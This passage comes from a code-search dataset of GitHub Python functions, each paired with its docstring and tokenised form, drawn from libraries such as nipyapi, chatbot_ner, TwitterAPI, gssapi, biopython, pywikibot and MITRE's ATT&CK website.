"v",
",",
"cs6Label",
"=",
"'ContentPolicy'",
")",
"except",
"(",
"KeyError",
",",
"ValueError",
")",
",",
"e",
":",
"log",
".",
"debug",
"(",
"'Exception in CSP report: %s'",
"%",
"e",
",",
"exc_info",
"=",
"True",
")",
"return",
"HttpResponseBadRequest",
"(",
")",
"return",
"HttpResponse",
"(",
")"
] |
https://github.com/mozilla/zamboni/blob/14b1a44658e47b9f048962fa52dbf00a3beaaf30/mkt/site/views.py#L229-L251
|
|
Chaffelson/nipyapi
|
d3b186fd701ce308c2812746d98af9120955e810
|
nipyapi/nifi/apis/flow_api.py
|
python
|
FlowApi.search_flow_with_http_info
|
(self, **kwargs)
|
return self.api_client.call_api('/flow/search-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResultsEntity',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:param str a:
:return: SearchResultsEntity
If the method is called asynchronously,
returns the request thread.
|
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
|
[
"Performs",
"a",
"search",
"against",
"this",
"NiFi",
"using",
"the",
"specified",
"search",
"term",
"Only",
"search",
"results",
"from",
"authorized",
"components",
"will",
"be",
"returned",
".",
"This",
"method",
"makes",
"a",
"synchronous",
"HTTP",
"request",
"by",
"default",
".",
"To",
"make",
"an",
"asynchronous",
"HTTP",
"request",
"please",
"define",
"a",
"callback",
"function",
"to",
"be",
"invoked",
"when",
"receiving",
"the",
"response",
".",
">>>",
"def",
"callback_function",
"(",
"response",
")",
":",
">>>",
"pprint",
"(",
"response",
")",
">>>",
">>>",
"thread",
"=",
"api",
".",
"search_flow_with_http_info",
"(",
"callback",
"=",
"callback_function",
")"
] |
def search_flow_with_http_info(self, **kwargs):
"""
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:param str a:
:return: SearchResultsEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q', 'a']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_flow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'q' in params:
query_params.append(('q', params['q']))
if 'a' in params:
query_params.append(('a', params['a']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/flow/search-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResultsEntity',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"def",
"search_flow_with_http_info",
"(",
"self",
",",
"*",
"*",
"kwargs",
")",
":",
"all_params",
"=",
"[",
"'q'",
",",
"'a'",
"]",
"all_params",
".",
"append",
"(",
"'callback'",
")",
"all_params",
".",
"append",
"(",
"'_return_http_data_only'",
")",
"all_params",
".",
"append",
"(",
"'_preload_content'",
")",
"all_params",
".",
"append",
"(",
"'_request_timeout'",
")",
"params",
"=",
"locals",
"(",
")",
"for",
"key",
",",
"val",
"in",
"iteritems",
"(",
"params",
"[",
"'kwargs'",
"]",
")",
":",
"if",
"key",
"not",
"in",
"all_params",
":",
"raise",
"TypeError",
"(",
"\"Got an unexpected keyword argument '%s'\"",
"\" to method search_flow\"",
"%",
"key",
")",
"params",
"[",
"key",
"]",
"=",
"val",
"del",
"params",
"[",
"'kwargs'",
"]",
"collection_formats",
"=",
"{",
"}",
"path_params",
"=",
"{",
"}",
"query_params",
"=",
"[",
"]",
"if",
"'q'",
"in",
"params",
":",
"query_params",
".",
"append",
"(",
"(",
"'q'",
",",
"params",
"[",
"'q'",
"]",
")",
")",
"if",
"'a'",
"in",
"params",
":",
"query_params",
".",
"append",
"(",
"(",
"'a'",
",",
"params",
"[",
"'a'",
"]",
")",
")",
"header_params",
"=",
"{",
"}",
"form_params",
"=",
"[",
"]",
"local_var_files",
"=",
"{",
"}",
"body_params",
"=",
"None",
"# HTTP header `Accept`",
"header_params",
"[",
"'Accept'",
"]",
"=",
"self",
".",
"api_client",
".",
"select_header_accept",
"(",
"[",
"'application/json'",
"]",
")",
"# HTTP header `Content-Type`",
"header_params",
"[",
"'Content-Type'",
"]",
"=",
"self",
".",
"api_client",
".",
"select_header_content_type",
"(",
"[",
"'*/*'",
"]",
")",
"# Authentication setting",
"auth_settings",
"=",
"[",
"'tokenAuth'",
"]",
"return",
"self",
".",
"api_client",
".",
"call_api",
"(",
"'/flow/search-results'",
",",
"'GET'",
",",
"path_params",
",",
"query_params",
",",
"header_params",
",",
"body",
"=",
"body_params",
",",
"post_params",
"=",
"form_params",
",",
"files",
"=",
"local_var_files",
",",
"response_type",
"=",
"'SearchResultsEntity'",
",",
"auth_settings",
"=",
"auth_settings",
",",
"callback",
"=",
"params",
".",
"get",
"(",
"'callback'",
")",
",",
"_return_http_data_only",
"=",
"params",
".",
"get",
"(",
"'_return_http_data_only'",
")",
",",
"_preload_content",
"=",
"params",
".",
"get",
"(",
"'_preload_content'",
",",
"True",
")",
",",
"_request_timeout",
"=",
"params",
".",
"get",
"(",
"'_request_timeout'",
")",
",",
"collection_formats",
"=",
"collection_formats",
")"
] |
https://github.com/Chaffelson/nipyapi/blob/d3b186fd701ce308c2812746d98af9120955e810/nipyapi/nifi/apis/flow_api.py#L4490-L4568
|
|
mangye16/ReID-Survey
|
2ce2cfe890d78f6904890c9063ed156532325b60
|
video-reid-AWG/utils.py
|
python
|
save_gradient_images
|
(gradient, file_name)
|
Exports the original gradient image
Args:
gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)
file_name (str): File name to be exported
|
Exports the original gradient image
|
[
"Exports",
"the",
"original",
"gradient",
"image"
] |
def save_gradient_images(gradient, file_name):
"""
Exports the original gradient image
Args:
gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)
file_name (str): File name to be exported
"""
if not os.path.exists('../results'):
os.makedirs('../results')
# Normalize
gradient = gradient - gradient.min()
gradient /= gradient.max()
# Save image
path_to_file = os.path.join('../results', file_name + '.jpg')
save_image(gradient, path_to_file)
|
[
"def",
"save_gradient_images",
"(",
"gradient",
",",
"file_name",
")",
":",
"if",
"not",
"os",
".",
"path",
".",
"exists",
"(",
"'../results'",
")",
":",
"os",
".",
"makedirs",
"(",
"'../results'",
")",
"# Normalize",
"gradient",
"=",
"gradient",
"-",
"gradient",
".",
"min",
"(",
")",
"gradient",
"/=",
"gradient",
".",
"max",
"(",
")",
"# Save image",
"path_to_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"'../results'",
",",
"file_name",
"+",
"'.jpg'",
")",
"save_image",
"(",
"gradient",
",",
"path_to_file",
")"
] |
https://github.com/mangye16/ReID-Survey/blob/2ce2cfe890d78f6904890c9063ed156532325b60/video-reid-AWG/utils.py#L176-L191
|
||
hellohaptik/chatbot_ner
|
742104790170ae5b73c583c94db6786549337dc4
|
ner_v2/detectors/numeral/number_range/standard_number_range_detector.py
|
python
|
BaseNumberRangeDetector._detect_max_num_range_with_prefix_variants
|
(self, number_range_list=None, original_list=None)
|
return number_range_list, original_list
|
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
|
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
|
[
"Method",
"to",
"detect",
"number",
"range",
"containing",
"only",
"max",
"value",
"and",
"keywords",
"which",
"identify",
"value",
"as",
"min",
"present",
"before",
"them",
".",
"Example",
"-",
"less",
"than",
"2",
"{",
"less",
"than",
"=",
">",
"keyword",
"2",
"=",
">",
"max",
"value",
"}",
"At",
"most",
"seven",
"hundred",
"rupees",
"{",
"At",
"most",
"=",
">",
"keyword",
"seven",
"hundred",
"rupees",
"=",
">",
"min",
"value",
"}",
"Args",
":",
"number_range_list",
"(",
"list",
")",
":",
"original_list",
"(",
"list",
")",
":",
"Returns",
":",
"(",
"tuple",
")",
":",
"a",
"tuple",
"containing",
"(",
"list",
")",
":",
"list",
"containing",
"detected",
"numeric",
"text",
"(",
"list",
")",
":",
"list",
"containing",
"original",
"numeral",
"text"
] |
def _detect_max_num_range_with_prefix_variants(self, number_range_list=None, original_list=None):
"""
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
"""
number_range_list = number_range_list or []
original_list = original_list or []
if self.max_range_prefix_variants:
max_prefix_choices = '|'.join(self.max_range_prefix_variants)
max_range_start_pattern = re.compile(r'((?:{max_prefix_choices})\s+({number}\d+__))'.format(
number=numeral_constant.NUMBER_REPLACE_TEXT, max_prefix_choices=max_prefix_choices), re.UNICODE)
number_range_matches = max_range_start_pattern.findall(self.processed_text)
for match in number_range_matches:
number_range, original_text = self._get_number_range(min_part_match=None, max_part_match=match[1],
full_match=match[0])
if number_range and original_text:
number_range_list.append(number_range)
original_list.append(original_text)
return number_range_list, original_list
|
[
"def",
"_detect_max_num_range_with_prefix_variants",
"(",
"self",
",",
"number_range_list",
"=",
"None",
",",
"original_list",
"=",
"None",
")",
":",
"number_range_list",
"=",
"number_range_list",
"or",
"[",
"]",
"original_list",
"=",
"original_list",
"or",
"[",
"]",
"if",
"self",
".",
"max_range_prefix_variants",
":",
"max_prefix_choices",
"=",
"'|'",
".",
"join",
"(",
"self",
".",
"max_range_prefix_variants",
")",
"max_range_start_pattern",
"=",
"re",
".",
"compile",
"(",
"r'((?:{max_prefix_choices})\\s+({number}\\d+__))'",
".",
"format",
"(",
"number",
"=",
"numeral_constant",
".",
"NUMBER_REPLACE_TEXT",
",",
"max_prefix_choices",
"=",
"max_prefix_choices",
")",
",",
"re",
".",
"UNICODE",
")",
"number_range_matches",
"=",
"max_range_start_pattern",
".",
"findall",
"(",
"self",
".",
"processed_text",
")",
"for",
"match",
"in",
"number_range_matches",
":",
"number_range",
",",
"original_text",
"=",
"self",
".",
"_get_number_range",
"(",
"min_part_match",
"=",
"None",
",",
"max_part_match",
"=",
"match",
"[",
"1",
"]",
",",
"full_match",
"=",
"match",
"[",
"0",
"]",
")",
"if",
"number_range",
"and",
"original_text",
":",
"number_range_list",
".",
"append",
"(",
"number_range",
")",
"original_list",
".",
"append",
"(",
"original_text",
")",
"return",
"number_range_list",
",",
"original_list"
] |
https://github.com/hellohaptik/chatbot_ner/blob/742104790170ae5b73c583c94db6786549337dc4/ner_v2/detectors/numeral/number_range/standard_number_range_detector.py#L330-L358
|
|
osmr/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
gluon/datasets/coco_hpe3_dataset.py
|
python
|
CocoHpe3MetaInfo.add_dataset_parser_arguments
|
(self,
parser,
work_dir_path)
|
Create python script parameters (for ImageNet-1K dataset metainfo).
Parameters:
----------
parser : ArgumentParser
ArgumentParser instance.
work_dir_path : str
Path to working directory.
|
Create python script parameters (for ImageNet-1K dataset metainfo).
|
[
"Create",
"python",
"script",
"parameters",
"(",
"for",
"ImageNet",
"-",
"1K",
"dataset",
"metainfo",
")",
"."
] |
def add_dataset_parser_arguments(self,
parser,
work_dir_path):
"""
Create python script parameters (for ImageNet-1K dataset metainfo).
Parameters:
----------
parser : ArgumentParser
ArgumentParser instance.
work_dir_path : str
Path to working directory.
"""
super(CocoHpe3MetaInfo, self).add_dataset_parser_arguments(parser, work_dir_path)
parser.add_argument(
"--input-size",
type=int,
nargs=2,
default=self.input_image_size,
help="size of the input for model")
parser.add_argument(
"--load-ignore-extra",
action="store_true",
help="ignore extra layers in the source PyTroch model")
|
[
"def",
"add_dataset_parser_arguments",
"(",
"self",
",",
"parser",
",",
"work_dir_path",
")",
":",
"super",
"(",
"CocoHpe3MetaInfo",
",",
"self",
")",
".",
"add_dataset_parser_arguments",
"(",
"parser",
",",
"work_dir_path",
")",
"parser",
".",
"add_argument",
"(",
"\"--input-size\"",
",",
"type",
"=",
"int",
",",
"nargs",
"=",
"2",
",",
"default",
"=",
"self",
".",
"input_image_size",
",",
"help",
"=",
"\"size of the input for model\"",
")",
"parser",
".",
"add_argument",
"(",
"\"--load-ignore-extra\"",
",",
"action",
"=",
"\"store_true\"",
",",
"help",
"=",
"\"ignore extra layers in the source PyTroch model\"",
")"
] |
https://github.com/osmr/imgclsmob/blob/f2993d3ce73a2f7ddba05da3891defb08547d504/gluon/datasets/coco_hpe3_dataset.py#L513-L536
|
||
zhl2008/awd-platform
|
0416b31abea29743387b10b3914581fbe8e7da5e
|
web_hxb2/lib/python3.5/site-packages/wagtail/utils/setup.py
|
python
|
assets_mixin.compile_assets
|
(self)
|
[] |
def compile_assets(self):
try:
subprocess.check_call(['npm', 'run', 'build'])
except (OSError, subprocess.CalledProcessError) as e:
print('Error compiling assets: ' + str(e)) # noqa
raise SystemExit(1)
|
[
"def",
"compile_assets",
"(",
"self",
")",
":",
"try",
":",
"subprocess",
".",
"check_call",
"(",
"[",
"'npm'",
",",
"'run'",
",",
"'build'",
"]",
")",
"except",
"(",
"OSError",
",",
"subprocess",
".",
"CalledProcessError",
")",
"as",
"e",
":",
"print",
"(",
"'Error compiling assets: '",
"+",
"str",
"(",
"e",
")",
")",
"# noqa",
"raise",
"SystemExit",
"(",
"1",
")"
] |
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/wagtail/utils/setup.py#L17-L22
|
||||
dboyd13/DSVR
|
56fd0b30294a02dabc8af9178c3ed9980c229c94
|
lib/IPy.py
|
python
|
_count1Bits
|
(num)
|
return ret
|
Find the highest bit set to 1 in an integer.
|
Find the highest bit set to 1 in an integer.
|
[
"Find",
"the",
"highest",
"bit",
"set",
"to",
"1",
"in",
"an",
"integer",
"."
] |
def _count1Bits(num):
"""Find the highest bit set to 1 in an integer."""
ret = 0
while num > 0:
num = num >> 1
ret += 1
return ret
|
[
"def",
"_count1Bits",
"(",
"num",
")",
":",
"ret",
"=",
"0",
"while",
"num",
">",
"0",
":",
"num",
"=",
"num",
">>",
"1",
"ret",
"+=",
"1",
"return",
"ret"
] |
https://github.com/dboyd13/DSVR/blob/56fd0b30294a02dabc8af9178c3ed9980c229c94/lib/IPy.py#L1264-L1270
|
|
geduldig/TwitterAPI
|
1cb89e8fc50b051707fb99d6c2bb235ada5faf1a
|
TwitterAPI/TwitterAPI.py
|
python
|
_hydrate_tweets
|
(data, includes, field_suffix)
|
return data
|
Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
:param data: "data" property value in JSON response
:param includes: "includes" property value in JSON response
:param field_suffix: Suffix appended to a hydrated field name.
Either "_hydrate" which puts hydrated values into
a new field, or "" which replaces the current
field value with hydrated values.
:returns: Tweet status as a JSON object.
|
Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
|
[
"Insert",
"expansion",
"fields",
"back",
"into",
"tweet",
"data",
"by",
"appending",
"a",
"new",
"field",
"as",
"a",
"sibling",
"to",
"the",
"referenced",
"field",
"."
] |
def _hydrate_tweets(data, includes, field_suffix):
"""Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
:param data: "data" property value in JSON response
:param includes: "includes" property value in JSON response
:param field_suffix: Suffix appended to a hydrated field name.
Either "_hydrate" which puts hydrated values into
a new field, or "" which replaces the current
field value with hydrated values.
:returns: Tweet status as a JSON object.
"""
new_fields = []
for key in includes:
incl = includes[key]
for obj in incl:
for field in ['id', 'media_key', 'username']:
if field in obj:
_create_include_fields(data, (obj[field], obj), new_fields)
for item in new_fields:
parent = item[0]
field = item[1] + field_suffix
include = item[2]
if field in parent:
if item[1] == 'media_keys':
parent[field] += include
if field_suffix == '':
# REPLACE option
parent[field].remove(include[0]['media_key'])
else:
parent[field] = include
else:
parent[field] = include
return data
|
[
"def",
"_hydrate_tweets",
"(",
"data",
",",
"includes",
",",
"field_suffix",
")",
":",
"new_fields",
"=",
"[",
"]",
"for",
"key",
"in",
"includes",
":",
"incl",
"=",
"includes",
"[",
"key",
"]",
"for",
"obj",
"in",
"incl",
":",
"for",
"field",
"in",
"[",
"'id'",
",",
"'media_key'",
",",
"'username'",
"]",
":",
"if",
"field",
"in",
"obj",
":",
"_create_include_fields",
"(",
"data",
",",
"(",
"obj",
"[",
"field",
"]",
",",
"obj",
")",
",",
"new_fields",
")",
"for",
"item",
"in",
"new_fields",
":",
"parent",
"=",
"item",
"[",
"0",
"]",
"field",
"=",
"item",
"[",
"1",
"]",
"+",
"field_suffix",
"include",
"=",
"item",
"[",
"2",
"]",
"if",
"field",
"in",
"parent",
":",
"if",
"item",
"[",
"1",
"]",
"==",
"'media_keys'",
":",
"parent",
"[",
"field",
"]",
"+=",
"include",
"if",
"field_suffix",
"==",
"''",
":",
"# REPLACE option",
"parent",
"[",
"field",
"]",
".",
"remove",
"(",
"include",
"[",
"0",
"]",
"[",
"'media_key'",
"]",
")",
"else",
":",
"parent",
"[",
"field",
"]",
"=",
"include",
"else",
":",
"parent",
"[",
"field",
"]",
"=",
"include",
"return",
"data"
] |
https://github.com/geduldig/TwitterAPI/blob/1cb89e8fc50b051707fb99d6c2bb235ada5faf1a/TwitterAPI/TwitterAPI.py#L438-L473
|
|
ShreyAmbesh/Traffic-Rule-Violation-Detection-System
|
ae0c327ce014ce6a427da920b5798a0d4bbf001e
|
openalpr_api/models/plate_candidate.py
|
python
|
PlateCandidate.to_dict
|
(self)
|
return result
|
Returns the model properties as a dict
|
Returns the model properties as a dict
|
[
"Returns",
"the",
"model",
"properties",
"as",
"a",
"dict"
] |
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
|
[
"def",
"to_dict",
"(",
"self",
")",
":",
"result",
"=",
"{",
"}",
"for",
"attr",
",",
"_",
"in",
"iteritems",
"(",
"self",
".",
"swagger_types",
")",
":",
"value",
"=",
"getattr",
"(",
"self",
",",
"attr",
")",
"if",
"isinstance",
"(",
"value",
",",
"list",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"list",
"(",
"map",
"(",
"lambda",
"x",
":",
"x",
".",
"to_dict",
"(",
")",
"if",
"hasattr",
"(",
"x",
",",
"\"to_dict\"",
")",
"else",
"x",
",",
"value",
")",
")",
"elif",
"hasattr",
"(",
"value",
",",
"\"to_dict\"",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"value",
".",
"to_dict",
"(",
")",
"elif",
"isinstance",
"(",
"value",
",",
"dict",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"dict",
"(",
"map",
"(",
"lambda",
"item",
":",
"(",
"item",
"[",
"0",
"]",
",",
"item",
"[",
"1",
"]",
".",
"to_dict",
"(",
")",
")",
"if",
"hasattr",
"(",
"item",
"[",
"1",
"]",
",",
"\"to_dict\"",
")",
"else",
"item",
",",
"value",
".",
"items",
"(",
")",
")",
")",
"else",
":",
"result",
"[",
"attr",
"]",
"=",
"value",
"return",
"result"
] |
https://github.com/ShreyAmbesh/Traffic-Rule-Violation-Detection-System/blob/ae0c327ce014ce6a427da920b5798a0d4bbf001e/openalpr_api/models/plate_candidate.py#L129-L153
|
|
zhl2008/awd-platform
|
0416b31abea29743387b10b3914581fbe8e7da5e
|
web_flaskbb/lib/python2.7/site-packages/pytz/tzinfo.py
|
python
|
DstTzInfo.__reduce__
|
(self)
|
return pytz._p, (
self.zone,
_to_seconds(self._utcoffset),
_to_seconds(self._dst),
self._tzname
)
|
[] |
def __reduce__(self):
# Special pickle to zone remains a singleton and to cope with
# database changes.
return pytz._p, (
self.zone,
_to_seconds(self._utcoffset),
_to_seconds(self._dst),
self._tzname
)
|
[
"def",
"__reduce__",
"(",
"self",
")",
":",
"# Special pickle to zone remains a singleton and to cope with",
"# database changes.",
"return",
"pytz",
".",
"_p",
",",
"(",
"self",
".",
"zone",
",",
"_to_seconds",
"(",
"self",
".",
"_utcoffset",
")",
",",
"_to_seconds",
"(",
"self",
".",
"_dst",
")",
",",
"self",
".",
"_tzname",
")"
] |
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/lib/python2.7/site-packages/pytz/tzinfo.py#L518-L526
|
|||
cloudera/hue
|
23f02102d4547c17c32bd5ea0eb24e9eadd657a4
|
desktop/core/ext-py/gssapi-1.5.1/gssapi/creds.py
|
python
|
Credentials.store
|
(self, store=None, usage='both', mech=None,
overwrite=False, set_default=False)
|
Store these credentials into the given store
This method stores the current credentials into the specified
credentials store. If the default store is used, support for
:rfc:`5588` is required. Otherwise, support for the credentials
store extension is required.
:requires-ext:`rfc5588` or :requires-ext:`cred_store`
Args:
store (dict): the store into which to store the credentials,
or None for the default store.
usage (str): the usage to store the credentials with -- either
'both', 'initiate', or 'accept'
mech (OID): the :class:`MechType` to associate with the
stored credentials
overwrite (bool): whether or not to overwrite existing credentials
stored with the same name, etc
set_default (bool): whether or not to set these credentials as
the default credentials for the given store.
Returns:
StoreCredResult: the results of the credential storing operation
Raises:
GSSError
ExpiredCredentialsError
MissingCredentialsError
OperationUnavailableError
DuplicateCredentialsElementError
|
Store these credentials into the given store
|
[
"Store",
"these",
"credentials",
"into",
"the",
"given",
"store"
] |
def store(self, store=None, usage='both', mech=None,
overwrite=False, set_default=False):
"""Store these credentials into the given store
This method stores the current credentials into the specified
credentials store. If the default store is used, support for
:rfc:`5588` is required. Otherwise, support for the credentials
store extension is required.
:requires-ext:`rfc5588` or :requires-ext:`cred_store`
Args:
store (dict): the store into which to store the credentials,
or None for the default store.
usage (str): the usage to store the credentials with -- either
'both', 'initiate', or 'accept'
mech (OID): the :class:`MechType` to associate with the
stored credentials
overwrite (bool): whether or not to overwrite existing credentials
stored with the same name, etc
set_default (bool): whether or not to set these credentials as
the default credentials for the given store.
Returns:
StoreCredResult: the results of the credential storing operation
Raises:
GSSError
ExpiredCredentialsError
MissingCredentialsError
OperationUnavailableError
DuplicateCredentialsElementError
"""
if store is None:
if rcred_rfc5588 is None:
raise NotImplementedError("Your GSSAPI implementation does "
"not have support for RFC 5588")
return rcred_rfc5588.store_cred(self, usage, mech,
overwrite, set_default)
else:
if rcred_cred_store is None:
raise NotImplementedError("Your GSSAPI implementation does "
"not have support for manipulating "
"credential stores directly")
store = _encode_dict(store)
return rcred_cred_store.store_cred_into(store, self, usage, mech,
overwrite, set_default)
|
[
"def",
"store",
"(",
"self",
",",
"store",
"=",
"None",
",",
"usage",
"=",
"'both'",
",",
"mech",
"=",
"None",
",",
"overwrite",
"=",
"False",
",",
"set_default",
"=",
"False",
")",
":",
"if",
"store",
"is",
"None",
":",
"if",
"rcred_rfc5588",
"is",
"None",
":",
"raise",
"NotImplementedError",
"(",
"\"Your GSSAPI implementation does \"",
"\"not have support for RFC 5588\"",
")",
"return",
"rcred_rfc5588",
".",
"store_cred",
"(",
"self",
",",
"usage",
",",
"mech",
",",
"overwrite",
",",
"set_default",
")",
"else",
":",
"if",
"rcred_cred_store",
"is",
"None",
":",
"raise",
"NotImplementedError",
"(",
"\"Your GSSAPI implementation does \"",
"\"not have support for manipulating \"",
"\"credential stores directly\"",
")",
"store",
"=",
"_encode_dict",
"(",
"store",
")",
"return",
"rcred_cred_store",
".",
"store_cred_into",
"(",
"store",
",",
"self",
",",
"usage",
",",
"mech",
",",
"overwrite",
",",
"set_default",
")"
] |
https://github.com/cloudera/hue/blob/23f02102d4547c17c32bd5ea0eb24e9eadd657a4/desktop/core/ext-py/gssapi-1.5.1/gssapi/creds.py#L153-L203
|
||
biopython/biopython
|
2dd97e71762af7b046d7f7f8a4f1e38db6b06c86
|
Bio/SearchIO/BlastIO/blast_xml.py
|
python
|
BlastXmlWriter._write_elem_block
|
(self, block_name, map_name, obj, opt_dict=None)
|
Write sibling XML elements (PRIVATE).
:param block_name: common element name prefix
:type block_name: string
:param map_name: name of mapping between element and attribute names
:type map_name: string
:param obj: object whose attribute value will be used
:type obj: object
:param opt_dict: custom element-attribute mapping
:type opt_dict: dictionary {string: string}
|
Write sibling XML elements (PRIVATE).
|
[
"Write",
"sibling",
"XML",
"elements",
"(",
"PRIVATE",
")",
"."
] |
def _write_elem_block(self, block_name, map_name, obj, opt_dict=None):
"""Write sibling XML elements (PRIVATE).
:param block_name: common element name prefix
:type block_name: string
:param map_name: name of mapping between element and attribute names
:type map_name: string
:param obj: object whose attribute value will be used
:type obj: object
:param opt_dict: custom element-attribute mapping
:type opt_dict: dictionary {string: string}
"""
if opt_dict is None:
opt_dict = {}
for elem, attr in _WRITE_MAPS[map_name]:
elem = block_name + elem
try:
content = str(getattr(obj, attr))
except AttributeError:
# ensure attrs that is not present is optional
if elem not in _DTD_OPT:
raise ValueError(f"Element {elem!r} (attribute {attr!r}) not found")
else:
# custom element-attribute mapping, for fallback values
if elem in opt_dict:
content = opt_dict[elem]
self.xml.simpleElement(elem, content)
|
[
"def",
"_write_elem_block",
"(",
"self",
",",
"block_name",
",",
"map_name",
",",
"obj",
",",
"opt_dict",
"=",
"None",
")",
":",
"if",
"opt_dict",
"is",
"None",
":",
"opt_dict",
"=",
"{",
"}",
"for",
"elem",
",",
"attr",
"in",
"_WRITE_MAPS",
"[",
"map_name",
"]",
":",
"elem",
"=",
"block_name",
"+",
"elem",
"try",
":",
"content",
"=",
"str",
"(",
"getattr",
"(",
"obj",
",",
"attr",
")",
")",
"except",
"AttributeError",
":",
"# ensure attrs that is not present is optional",
"if",
"elem",
"not",
"in",
"_DTD_OPT",
":",
"raise",
"ValueError",
"(",
"f\"Element {elem!r} (attribute {attr!r}) not found\"",
")",
"else",
":",
"# custom element-attribute mapping, for fallback values",
"if",
"elem",
"in",
"opt_dict",
":",
"content",
"=",
"opt_dict",
"[",
"elem",
"]",
"self",
".",
"xml",
".",
"simpleElement",
"(",
"elem",
",",
"content",
")"
] |
https://github.com/biopython/biopython/blob/2dd97e71762af7b046d7f7f8a4f1e38db6b06c86/Bio/SearchIO/BlastIO/blast_xml.py#L784-L811
|
||
wikimedia/pywikibot
|
81a01ffaec7271bf5b4b170f85a80388420a4e78
|
pywikibot/page/__init__.py
|
python
|
BaseLink.__str__
|
(self)
|
return self.astext()
|
Return a str string representation.
|
Return a str string representation.
|
[
"Return",
"a",
"str",
"string",
"representation",
"."
] |
def __str__(self) -> str:
"""Return a str string representation."""
return self.astext()
|
[
"def",
"__str__",
"(",
"self",
")",
"->",
"str",
":",
"return",
"self",
".",
"astext",
"(",
")"
] |
https://github.com/wikimedia/pywikibot/blob/81a01ffaec7271bf5b4b170f85a80388420a4e78/pywikibot/page/__init__.py#L5210-L5212
|
|
mitre-attack/attack-website
|
446748b71f412f7125d596a5eae0869559c89f05
|
modules/util/stixhelpers.py
|
python
|
get_stix_memory_stores
|
()
|
return ms, srcs
|
This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
|
This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
|
[
"This",
"function",
"reads",
"the",
"json",
"files",
"for",
"each",
"domain",
"and",
"creates",
"a",
"dict",
"that",
"contains",
"the",
"memory",
"stores",
"for",
"each",
"domain",
"."
] |
def get_stix_memory_stores():
"""This function reads the json files for each domain and creates a dict
that contains the memory stores for each domain.
"""
# suppress InsecureRequestWarning: Unverified HTTPS request is being made
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ms = {}
srcs = []
# Set proxy
proxy = ""
if site_config.args.proxy:
proxy = site_config.args.proxy
proxyDict = {
"http" : proxy,
"https" : proxy
}
for domain in site_config.domains:
# Download json from http or https
